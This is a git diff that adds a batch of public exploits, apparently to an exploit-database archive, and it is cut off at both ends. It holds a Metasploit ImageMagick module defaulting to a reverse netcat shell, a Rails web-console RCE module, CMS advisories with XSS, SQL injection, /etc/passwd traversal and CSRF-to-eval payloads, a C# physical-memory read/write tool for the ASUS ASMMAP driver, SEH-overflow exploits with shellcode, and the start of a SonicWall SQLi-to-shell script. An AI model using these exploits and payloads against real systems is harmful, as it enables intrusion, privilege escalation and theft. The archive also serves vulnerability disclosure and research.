+        %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
+        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
+      ],
+      'DisclosureDate'  => 'May 3 2016',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'Privileged'      => false,
+      'Payload'         => {
+        'BadChars'      => "\x22\x27\x5c", # ", ', and \
+        'Compat'        => {
+          'PayloadType' => 'cmd cmd_bash',
+          'RequiredCmd' => 'generic netcat bash-tcp'
+        }
+      },
+      'Targets'         => [
+        ['SVG file',  template: 'msf.svg'], # convert msf.png msf.svg
+        ['MVG file',  template: 'msf.mvg'], # convert msf.svg msf.mvg
+        ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
+      ],
+      'DefaultTarget'   => 0,
+      'DefaultOptions'  => {
+        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
+        'LHOST'                 => Rex::Socket.source_address,
+        'DisablePayloadHandler' => false,
+        'WfsDelay'              => 9001
+      }
+    ))
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
+    ])
+  end
+
+  def exploit
+    if target.name == 'SVG file'
+      p = Rex::Text.html_encode(payload.encoded)
+    else
+      p = payload.encoded
+    end
+
+    file_create(template.sub('echo vulnerable', p))
+  end
+
+  def template
+    File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
+    ))
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/39781.txt b/platforms/php/webapps/39781.txt
new file mode 100755
index 000000000..b41f257b7
--- /dev/null
+++ b/platforms/php/webapps/39781.txt
@@ -0,0 +1,69 @@
+Ajaxel CMS 8.0 Multiple Vulnerabilities
+
+Vendor: Ajaxel
+Product web page: http://www.ajaxel.com
+Affected version: 8.0 and below
+
+Summary: Ajaxel CMS is very simple ajaxified CMS and framework
+for any project needs.
+
+Desc: Ajaxel CMS version 8.0 and below suffers from multiple
+vulnerabilities inlcuding LFI, XSS, SQL injection and remote
+code execution via CSRF.
+
+Tested on: Apache 2.4.10
+           MySQL 5.5.46
+
+Vendor status:
+[13.04.2016] Vulnerabilities discovered.
+[14.04.2016] Vendor contacted.
+[18.04.2016] Vendor releases patch for version 8.0 to address these issues.
+[05.05.2016] Public security advisory released.
+
+Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
+[dizzyduck_at_zeroscience.mk]
+
+
+1. Reflected XSS:
+-----------------
+
+GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
+Host: 192.168.10.5
+
+HTTP/1.0 404 Not Found
+...
+...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,
+USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',
+REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,
+URL_KEY_ADMIN:'cms',...
+
+
+2. SQL Injection:
+-----------------
+
+http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>
+
+
+3. Local File Disclosure:
+-------------------------
+
+http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd
+
+
+4. Cross-Site Request Forgery - RCE PoC:
+----------------------------------------
+
+<html>
+  <body>
+    <form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"
+method="POST">
+      <input type="hidden" name="data&#91;eval&#93;"
+value="phpinfo&#40;&#41;&#59;" />
+      <input type="hidden" name="a" value="eval" />
+      <input type="hidden"
+name="settings&#95;eval&#95;tab&#95;eval&#45;submitted" value="1" />
+      <input type="submit" value="Execute" />
+    </form>
+  </body>
+</html>
+
diff --git a/platforms/php/webapps/39784.txt b/platforms/php/webapps/39784.txt
new file mode 100755
index 000000000..5e8a13b69
--- /dev/null
+++ b/platforms/php/webapps/39784.txt
@@ -0,0 +1,94 @@
+ZeewaysCMS Multiple Vulnerabilities
+
+
+[Software]
+
+- ZeewaysCMS
+
+
+[Vendor Product Description]
+
+- ZeewaysCMS is a Content Management System and a complete Web & Mobile Solution developed by Zeeways for Corporates, 
+Individuals or any kind of Business needs.
+
+
+- Site: http://www.zeewayscms.com/
+
+
+[Advisory Timeline]
+
+[25.03.2016] Vulnerability discovered.
+[25.03.2016] Vendor contacted.
+[29.03.2016] Follow up with the vendor.
+[29.03.2016] Vendor responded asking for details.
+[29.03.2016] Advisory and details sent to the vendor.
+[06.04.2016] Follow up with the vendor. No response received.
+[06.05.2016] Public security advisory released.
+
+
+[Bug Summary]
+
+- Directory Traversal
+
+- Cross Site Scripting (Stored)
+
+
+[Impact]
+
+- High
+
+
+[Affected Version]
+
+- Unknown
+
+
+[Tested on]
+
+- Apache/2.2.27
+- PHP/5.4.28
+
+
+[Advisory]
+
+- ID: ZSL-2016-5319
+- URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5319.php
+
+
+[Bug Description and Proof of Concept]
+
+- ZeewaysCMS suffers from a file inclusion vulnerability (LFI) when encoded input passed thru the 'targeturl' GET 
+parameter is not properly verified before being used to include files. This can be exploited to include files from 
+local resources with directory traversal attacks and URL encoded NULL bytes.
+https://en.wikipedia.org/wiki/Directory_traversal_attack
+
+- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed 
+via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to 
+execute arbitrary HTML and script code in a user's browser session in context of an affected site.
+https://en.wikipedia.org/wiki/Cross-site_scripting
+
+
+[Proof-of-Concept]
+
+1. Directory Traversal:
+
+http://localhost/demo//createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual
+Parameters: targeturl (GET)
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+2. Cross Site Scripting (Stored)
+
+http://localhost/demo/profile
+Parameters: screen_name, f_name, l_name, uc_email, uc_mobile, user_contact_num (POST)
+
+Payload(s):
+Content-Disposition: form-data; name="screen_name"
+
+"><script><<imgIMG SRC=oi onerror=JaVaScript:alert(1)>
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+All flaws described here were discovered and researched by:
+
+Bikramaditya Guha aka "PhoenixX"
\ No newline at end of file
diff --git a/platforms/ruby/remote/39792.rb b/platforms/ruby/remote/39792.rb
new file mode 100755
index 000000000..abd733321
--- /dev/null
+++ b/platforms/ruby/remote/39792.rb
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby on Rails Development Web Console (v2) Code Execution',
+      'Description'    => %q{
+          This module exploits a remote code execution feature of the Ruby on Rails
+        framework. This feature is exposed if the config.web_console.whitelisted_ips
+        setting includes untrusted IP ranges and the web-console gem is enabled.
+      },
+      'Author'         => ['hdm'],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://github.com/rails/web-console' ]
+        ],
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Privileged'     => false,
+      'Targets'        => [ ['Automatic', {} ] ],
+      'DefaultOptions' => { 'PrependFork' => true },
+      'DisclosureDate' => 'May 2 2016',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(3000),
+        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ])
+      ], self.class)
+  end
+
+  #
+  # Identify the web console path and session ID, then inject code with it
+  #
+  def exploit
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path),
+      'method'  => 'GET'
+    }, 25)
+
+    unless res
+      print_error("Error: No response requesting #{datastore['TARGETURI']}")
+      return
+    end
+
+    unless res.body.to_s =~ /data-mount-point='([^']+)'/
+      if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
+        print_error('Error: The web console is either disabled or you are not in the whitelisted scope')
+      else
+        print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
+      end
+      return
+    end
+
+    console_path = normalize_uri($1, 'repl_sessions')
+
+    unless res.body.to_s =~ /data-session-id='([^']+)'/
+      print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
+      return
+    end
+
+    session_id = $1
+
+    print_status("Sending payload to #{console_path}/#{session_id}")
+    res = send_request_cgi({
+      'uri'       => normalize_uri(console_path, session_id),
+      'method'    => 'PUT',
+      'headers'   => {
+        'Accept'           => 'application/vnd.web-console.v2',
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_post' => {
+        'input' => payload.encoded
+      }
+    }, 25)
+  end
+end
\ No newline at end of file
diff --git a/platforms/windows/dos/39785.cs b/platforms/windows/dos/39785.cs
new file mode 100755
index 000000000..e86cefdaa
--- /dev/null
+++ b/platforms/windows/dos/39785.cs
@@ -0,0 +1,217 @@
+/*
+  Source: http://rol.im/asux/
+
+  ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write
+  PoC by slipstream/RoL - https://twitter.com/TheWack0lian - http://rol.im/chat/
+  
+  The ASUS "Generic Function Service" includes a couple of drivers, ASMMAP.sys / ASMMAP64.sys,
+  the version resources describe them as "Memory mapping Driver".
+  
+  This description is very accurate, it has a pair of ioctls, 0x9C402580 and 0x9C402584, that map or
+  unmap to the calling process' address space ANY PART OF PHYSICAL MEMORY, with READ/WRITE permissions.
+  Using code that has been copypasta'd a bunch of times, but seems to originate from a sample driver for NT 3.1.
+  1993 vintage code, everybody.
+  
+  It also has a couple of other ioctls that allocate or free some RAM and gives the physical and virtual pointers
+  to it, and another one that can make any I/O request (does in/out byte/word/dword with parameters given in the ioctl buffer,
+  and returns the result for the case of in). These.. don't really matter, I guess? Well, I guess you could mess with SMM
+  or other issues easily...
+  
+  This PoC can dump a block of physical memory to disk, and write to a block of physical memory from a file.
+  I wrote it in C# so others can easily add the ASMMap_MapMem class to their powershell exploitation frameworks, if they so want.
+  
+  To ASUS: MS locked PhysicalMemory down in 2004. Don't use 1993 code to remove the restrictions, and let even unprivileged users
+  access it (where back before it was locked to ring0, only SYSTEM could access it).
+  
+  To MS: why did you even sign asmmap/asmmap64? Probably automation. Come on, why does signing even exist if you sign whatever driver
+  an OEM asks you to, without checking?
+*/
+
+// This uses pointers, so compile with /unsafe.
+using System;
+using System.ComponentModel;
+using System.Globalization;
+using System.IO;
+using System.Runtime.InteropServices;
+using Microsoft.Win32.SafeHandles;
+
+public class ASMMap_MapMem : IDisposable {
+	
+	public const uint IOCTL_MAPMEM = 0x9C402580;
+	public const uint IOCTL_UNMAPMEM = 0x9C402584;
+	
+	[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
+	public static extern SafeFileHandle CreateFile(
+	   string lpFileName,
+	   [MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess,
+	   [MarshalAs(UnmanagedType.U4)] FileShare dwShareMode,
+	   IntPtr lpSecurityAttributes,
+	   [MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition,
+	   [MarshalAs(UnmanagedType.U4)] FileAttributes dwFlagsAndAttributes,
+	   IntPtr hTemplateFile);
+	
+	[DllImport("kernel32.dll", SetLastError = true)]
+	static extern bool DeviceIoControl(
+		SafeFileHandle hDevice,
+		uint IoControlCode,
+		ref MapMemIoctl InBuffer,
+		int nInBufferSize,
+		ref MapMemIoctl OutBuffer,
+		int nOutBufferSize,
+		IntPtr pBytesReturned,
+		IntPtr Overlapped
+	);
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public unsafe struct MapMemIoctl {
+		public ulong PhysicalAddress;
+		public byte* VirtualAddress;
+		[MarshalAs(UnmanagedType.ByValArray, SizeConst=2)]
+		public uint[] Length;
+		
+		public MapMemIoctl(SafeFileHandle asmmap,ulong PhysicalAddress,uint Length) {
+			this.PhysicalAddress = PhysicalAddress;
+			// Length[0] is used with ASMMAP64, Length[1] by ASMMAP. Set both here, ASMMAP will overwrite Length[0] anyway.
+			this.Length = new uint[2];
+			this.Length[0] = Length;
+			this.Length[1] = Length;
+			this.VirtualAddress = null;
+			// Fire the ioctl
+			Console.WriteLine("[*] Mapping 0x{0}-0x{1} into this process' address space...",PhysicalAddress.ToString("X"),(PhysicalAddress+Length).ToString("X"));
+			if (!DeviceIoControl(asmmap,IOCTL_MAPMEM,ref this,Marshal.SizeOf(typeof(MapMemIoctl)),ref this,Marshal.SizeOf(typeof(MapMemIoctl)),IntPtr.Zero,IntPtr.Zero)) {
+				throw new Win32Exception();
+			}
+			Console.WriteLine("[+] Mapped at 0x{0}",new IntPtr(this.VirtualAddress).ToInt64().ToString("X"));
+		}
+	}
+	
+	private MapMemIoctl mm;
+	private SafeFileHandle asmmap = null;
+	private bool ShouldDisposeOfAsmMap = false;
+	private bool HasBeenDisposed = false;
+	
+	public uint Length {
+		get {
+			if (this.HasBeenDisposed) throw new ObjectDisposedException("ASMMap_MapMem");
+			return mm.Length[ ( IntPtr.Size == 4 ? 1 : 0 ) ];
+		}
+	}
+	
+	public UnmanagedMemoryStream PhysicalMemoryBlock {
+		get {
+			if (this.HasBeenDisposed) throw new ObjectDisposedException("ASMMap_MapMem");
+			unsafe {
+				return new UnmanagedMemoryStream(mm.VirtualAddress,this.Length,this.Length,FileAccess.ReadWrite);
+			}
+		}
+	}
+	
+	public ASMMap_MapMem(ulong PhysicalAddress,uint Length) : this(null,PhysicalAddress,Length) {
+	}
+	
+	public ASMMap_MapMem(SafeFileHandle asmmap,ulong PhysicalAddress,uint Length) {
+		if (asmmap == null) {
+			asmmap = CreateFile("\\\\.\\ASMMAP" + (IntPtr.Size == 8 ? "64" : ""),FileAccess.ReadWrite,FileShare.None,
+				IntPtr.Zero,FileMode.Create,FileAttributes.Temporary,IntPtr.Zero);
+			this.ShouldDisposeOfAsmMap = true;
+		}
+		this.asmmap = asmmap;
+		this.mm = new MapMemIoctl(asmmap,PhysicalAddress,Length);
+	}
+	
+	public void Dispose() {
+		if (this.HasBeenDisposed) return;
+		unsafe { 
+			Console.WriteLine("[*] Unmapping 0x{0}-0x{1} (0x{2})...",
+				mm.PhysicalAddress.ToString("X"),
+				(mm.PhysicalAddress+Length).ToString("X"),
+				new IntPtr(mm.VirtualAddress).ToInt64().ToString("X")
+			);
+		}
+		try {
+			if (!DeviceIoControl(asmmap,IOCTL_UNMAPMEM,ref mm,Marshal.SizeOf(typeof(MapMemIoctl)),ref mm,Marshal.SizeOf(typeof(MapMemIoctl)),IntPtr.Zero,IntPtr.Zero)) {
+				throw new Win32Exception();
+			}
+			Console.WriteLine("[+] Unmapped successfully");
+		} finally {
+			// dispose of the driver handle if needed
+			if (this.ShouldDisposeOfAsmMap) asmmap.Dispose();
+			this.HasBeenDisposed = true;
+		}
+	}
+	
+	~ASMMap_MapMem() {
+		this.Dispose();
+	}
+}
+
+class asmmap {
+	public static bool TryParseDecAndHex(string value,out ulong result) {
+		if ((value.Length > 2) && (value.Substring(0,2) == "0x")) return ulong.TryParse(value.Substring(2),NumberStyles.AllowHexSpecifier,CultureInfo.InvariantCulture,out result);
+		return ulong.TryParse(value,out result);
+	}
+	
+	public static void Usage() {
+		Console.WriteLine("[*] Usage: {0} <read/write> <address> <length/file>",Path.GetFileName(System.Reflection.Assembly.GetEntryAssembly().Location));
+		Console.WriteLine("[*] address: starting physical address to read/write, can be decimal or hex, for hex, start with 0x");
+		Console.WriteLine("[*] length: size of memory to read, can be decimal or hex, for hex, start with 0x");
+		Console.WriteLine("[*] file: file whose contents will be written at <address>");
+	}
+	
+	public static void Read(ulong PhysicalAddress,ulong Length) {
+		uint IterationSize = ( IntPtr.Size == 8 ? (uint)0x10000000 : (uint)0x1000000 );
+		using (SafeFileHandle asmmap = ASMMap_MapMem.CreateFile("\\\\.\\ASMMAP" + (IntPtr.Size == 8 ? "64" : ""),FileAccess.ReadWrite,
+				FileShare.None,IntPtr.Zero,FileMode.Create,FileAttributes.Temporary,IntPtr.Zero))
+		using (FileStream stream = new FileStream("" + (PhysicalAddress.ToString("X")) + "-" + ((PhysicalAddress + Length).ToString("X")) + ".bin",FileMode.Create)) {
+			for (; Length > 0; Length -= IterationSize, PhysicalAddress += IterationSize) {
+				using (ASMMap_MapMem mapper = new ASMMap_MapMem(asmmap,PhysicalAddress,( Length > IterationSize ? IterationSize : (uint)(Length & 0xffffffff) ))) {
+					Console.WriteLine("[+] Reading block of memory...");
+					mapper.PhysicalMemoryBlock.CopyTo(stream);
+				}
+				if ( Length <= IterationSize) break;
+			}
+		}
+		Console.WriteLine("[+] Read successful: "+ (PhysicalAddress.ToString("X")) + "-" + ((PhysicalAddress + Length).ToString("X")) + ".bin");
+	}
+	
+	public static void Write(ulong PhysicalAddress,string Filename) {
+		using (FileStream stream = new FileStream(Filename,FileMode.Open))
+		using (ASMMap_MapMem mapper = new ASMMap_MapMem(PhysicalAddress,(uint)stream.Length)) {
+			Console.WriteLine("[+] Writing block of memory...");
+			stream.CopyTo(mapper.PhysicalMemoryBlock);
+		}
+	}
+	
+	public static void Main(string[] args) {
+		Console.WriteLine("[*] ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write");
+		Console.WriteLine("[*] PoC by slipstream/RoL - https://twitter.com/TheWack0lian - http://rol.im/chat/");
+		if (args.Length < 3) {
+			Usage();
+			return;
+		}
+		ulong PhysicalAddress, Length;
+		switch (args[0]) {
+			case "read":
+			case "-read":
+			case "--read":
+				if ((!TryParseDecAndHex(args[1],out PhysicalAddress)) || (!TryParseDecAndHex(args[2],out Length))) {
+					Usage();
+					return;
+				}
+				Read(PhysicalAddress,Length);
+				break;
+			case "write":
+			case "-write":
+			case "--write":
+				if (!TryParseDecAndHex(args[1],out PhysicalAddress)) {
+					Usage();
+					return;
+				}
+				Write(PhysicalAddress,args[2]);
+				break;
+			default:
+				Usage();
+				break;
+		}
+	}
+}
\ No newline at end of file
diff --git a/platforms/windows/dos/39789.py b/platforms/windows/dos/39789.py
new file mode 100755
index 000000000..e8cbd1f62
--- /dev/null
+++ b/platforms/windows/dos/39789.py
@@ -0,0 +1,30 @@
+#!/usr/bin/python
+# Exploit Title     : RPCScan v2.03 Hostname/IP Field SEH Overwrite POC
+# Discovery by      : Nipun Jaswal
+# Email             : mail@nipunjaswal.info
+# Discovery Date    : 08/05/2016
+# Vendor Homepage   : http://samspade.org
+# Software Link     : http://www.mcafee.com/in/downloads/free-tools/rpcscan.aspx#
+# Tested Version    : 2.03
+# Vulnerability Type: SEH Overwrite POC
+# Tested on OS      : Windows 7 Home Basic
+# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
+##########################################################################################
+#  -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+
+#SEH chain of main thread
+#Address    SE handler
+#0012FAA0   43434343
+#42424242   *** CORRUPT ENTRY ***
+
+# Offset to the SEH Frame is 536
+buffer = "A"*536
+# Address of the Next SEH Frame
+nseh = "B"*4
+# Address to the Handler Code, Generally P/P/R Address
+seh = "C" *4
+f = open("evil.txt", "wb")
+f.write(buffer+nseh+seh)
+f.close()
+
diff --git a/platforms/windows/local/39782.py b/platforms/windows/local/39782.py
new file mode 100755
index 000000000..fa09184ac
--- /dev/null
+++ b/platforms/windows/local/39782.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python
+
+# Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit
+# Date: 3-5-2016
+# Exploit Author: Tantaryu MING
+# Vendor Homepage: http://www.memecode.com/iftp.php
+# Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
+# Version: 2.21
+# Tested on: Windows 7 SP1 x86_64
+
+
+# How to exploit: Connect -> Host Address / URL -> copy + paste content of evil.txt -> Press 'Connect' button
+
+'''
+msfvenom -p windows/exec CMD=calc -e x86/alpha_upper -a x86 -f c -b '\x00\x0d\x20\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferREgister=EAX
+'''
+shellcode = (
+"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
+"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
+"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
+"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
+"\x4c\x5a\x48\x4b\x32\x35\x50\x33\x30\x43\x30\x33\x50\x4d\x59"
+"\x4a\x45\x36\x51\x39\x50\x42\x44\x4c\x4b\x30\x50\x56\x50\x4c"
+"\x4b\x51\x42\x34\x4c\x4c\x4b\x30\x52\x35\x44\x4c\x4b\x42\x52"
+"\x31\x38\x44\x4f\x58\x37\x51\x5a\x57\x56\x30\x31\x4b\x4f\x4e"
+"\x4c\x47\x4c\x35\x31\x43\x4c\x53\x32\x56\x4c\x51\x30\x59\x51"
+"\x58\x4f\x34\x4d\x53\x31\x49\x57\x4b\x52\x4a\x52\x50\x52\x50"
+"\x57\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x50\x4a\x37\x4c\x4c\x4b"
+"\x30\x4c\x54\x51\x52\x58\x4b\x53\x50\x48\x35\x51\x38\x51\x50"
+"\x51\x4c\x4b\x31\x49\x47\x50\x33\x31\x48\x53\x4c\x4b\x51\x59"
+"\x32\x38\x4d\x33\x47\x4a\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x35"
+"\x51\x59\x46\x56\x51\x4b\x4f\x4e\x4c\x59\x51\x48\x4f\x54\x4d"
+"\x45\x51\x58\x47\x57\x48\x4d\x30\x33\x45\x4a\x56\x55\x53\x53"
+"\x4d\x4c\x38\x57\x4b\x33\x4d\x47\x54\x52\x55\x4b\x54\x30\x58"
+"\x4c\x4b\x31\x48\x36\x44\x43\x31\x59\x43\x43\x56\x4c\x4b\x44"
+"\x4c\x50\x4b\x4c\x4b\x46\x38\x35\x4c\x45\x51\x4e\x33\x4c\x4b"
+"\x34\x44\x4c\x4b\x45\x51\x58\x50\x4b\x39\x51\x54\x36\x44\x57"
+"\x54\x51\x4b\x31\x4b\x33\x51\x36\x39\x51\x4a\x30\x51\x4b\x4f"
+"\x4b\x50\x51\x4f\x31\x4f\x30\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
+"\x4d\x51\x4d\x33\x5a\x55\x51\x4c\x4d\x4d\x55\x58\x32\x35\x50"
+"\x45\x50\x45\x50\x56\x30\x33\x58\x30\x31\x4c\x4b\x42\x4f\x4d"
+"\x57\x4b\x4f\x38\x55\x4f\x4b\x4a\x50\x4e\x55\x39\x32\x50\x56"
+"\x52\x48\x59\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x37"
+"\x4c\x35\x56\x33\x4c\x44\x4a\x4d\x50\x4b\x4b\x4b\x50\x42\x55"
+"\x33\x35\x4f\x4b\x37\x37\x55\x43\x53\x42\x52\x4f\x53\x5a\x33"
+"\x30\x46\x33\x4b\x4f\x39\x45\x53\x53\x45\x31\x52\x4c\x35\x33"
+"\x35\x50\x41\x41"
+)
+
+eax_zeroed = '\x25\x2E\x2E\x2E\x2E'
+eax_zeroed += '\x25\x11\x11\x11\x11'
+
+align_to_eax = "\x54\x58" # Get ESP and pop it into EAX
+align_to_eax += "\x2d\x7d\x7d\x7d\x7d" # SUB EAX, 0x7d7d7d7d
+align_to_eax += "\x2d\x01\x01\x01\x01" # SUB EAX, 0x01010101
+align_to_eax += "\x2d\x01\x01\x02\x02" # SUB EAX, 0x02020101
+align_to_eax += "\x2d\x7c\x73\x7f\x7f" # SUB EAX, 0x7f7f737c
+
+buffer = "\x41" * 1865
+buffer += "\x42\x42\x71\x04" # Pointer to Next SEH Record
+buffer += "\x78\x2a\x01\x10" # SEH HANDLER
+buffer += eax_zeroed
+buffer += align_to_eax
+buffer += "\x43" * 5
+buffer += shellcode
+buffer += "E" * 4
+  
+f = open('exploit.txt', "wb")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/platforms/windows/local/39786.txt b/platforms/windows/local/39786.txt
new file mode 100755
index 000000000..14c011c1f
--- /dev/null
+++ b/platforms/windows/local/39786.txt
@@ -0,0 +1,57 @@
+
+Certec EDV atvise SCADA server 2.5.9 Privilege Escalation Vulnerability
+
+
+Vendor: Certec EDV GmbH
+Product web page: http://www.atvise.com
+Affected version: 2.5.9
+
+Summary: atvise scada is based on newest technologies
+and standards: The visualization in pure web technology
+as well as a consistent vertical object orientation based
+on OPC UA changes the world of process management systems.
+
+Desc: The application suffers from an unquoted search path
+issue impacting the service 'atserver' for Windows deployed
+as part of atvise SCADA. This could potentially allow an
+authorized but non-privileged local user to execute arbitrary
+code with elevated privileges on the system. A successful
+attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or
+other security applications where it could potentially be
+executed during application startup or reboot. If successful,
+the local user’s code would execute with the elevated privileges
+of the application.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN) 64-bit
+           Microsoft Windows 7 Ultimate SP1 (EN) 64-bit
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5321
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5321.php
+
+Vendor: http://www.atvise.com/en/news-events/news/465-atvise-3-0-0-released
+
+
+17.03.2016
+
+---
+
+
+C:\Users\user>sc qc atserver
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: atserver
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\atvise\atserver.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : atvise server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
diff --git a/platforms/windows/local/39788.txt b/platforms/windows/local/39788.txt
new file mode 100755
index 000000000..f4e7151b1
--- /dev/null
+++ b/platforms/windows/local/39788.txt
@@ -0,0 +1,25 @@
+# Exploit Title: WebDAV Elevation of Privilege Vulnerability (MS16)-2
+# Date: 8/5/2016
+# Exploit Author: hex0r
+# Version:WebDAV on Windows 7 84x
+# CVE : CVE-2016-0051
+
+
+Intro:
+Credits go to koczkatama for coding a PoC, however if you run this exploit
+from shell connection, not a remote desktop, the result will be getting the
+privileged shell in new GUI windows.
+
+Again Thanks to
+https://github.com/koczkatamas/CVE-2016-0051
+https://www.exploit-db.com/exploits/39432/
+
+PoC:
+Download the source code (C#) also there will be compiled version as well,
+copy the dll file and the executable to the target machine, run it to get
+SYSTEM,
+
+
+Proof of Concept:
+https://github.com/hexx0r/CVE-2016-0051
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip
diff --git a/platforms/windows/remote/39783.py b/platforms/windows/remote/39783.py
new file mode 100755
index 000000000..b2892e715
--- /dev/null
+++ b/platforms/windows/remote/39783.py
@@ -0,0 +1,280 @@
+#!/usr/local/bin/python
+"""
+Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQL Injection Remote Code Execution
+sonic.py by mr_me@offensive-security.com
+greets to @brandonprry ;->
+
+Summary:
+========
+
+This exploits an pre-auth SQL Injection in the login.php script within an update statement to steal session data. You could also steal login creds 
+which require absolutely no hash cracking since the target uses symmetric encryption. It then exploits a second post-auth SQL Injection vulnerability 
+that writes a shell to the target using a relative path and gets SYSTEM.
+
+Vulnerability:
+==============
+
+In html/d4d/login.php on lines 27-34:
+
+    }else if ($_REQUEST['setSkin']){
+        echo setUserSkin(
+          array(
+            'db' => $db,
+            'user_id' => $_REQUEST['user_id'],
+            'skin' => $_REQUEST['setSkin']
+          )
+        );
+
+ Then, on lines 46-62:
+
+ function setUserSkin($args){
+    $db = $args['db'];
+    
+    $result = $db->query("
+UPDATE plixer.userpreferences
+SET setting = '$args[skin]'
+WHERE prefCode = 'skin'
+AND users_id = $args[user_id]");
+    
+    if ($args['user_id'] == 1){
+        $result2 = $db->query("
+UPDATE plixer.serverprefs
+SET currentVal = '$args[skin]'
+WHERE langKey = 'skin'");
+    }
+    
+}
+
+For the post-auth bug, see https://gist.github.com/brandonprry/76741d9a0d4f518fe297
+
+Example:
+========
+
+saturn:module-03 mr_me$ ./sonic.py
+
+	Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
+	mr_me@offensive-security.com
+
+(!) usage: ./poc.py <target> <connectback:port>
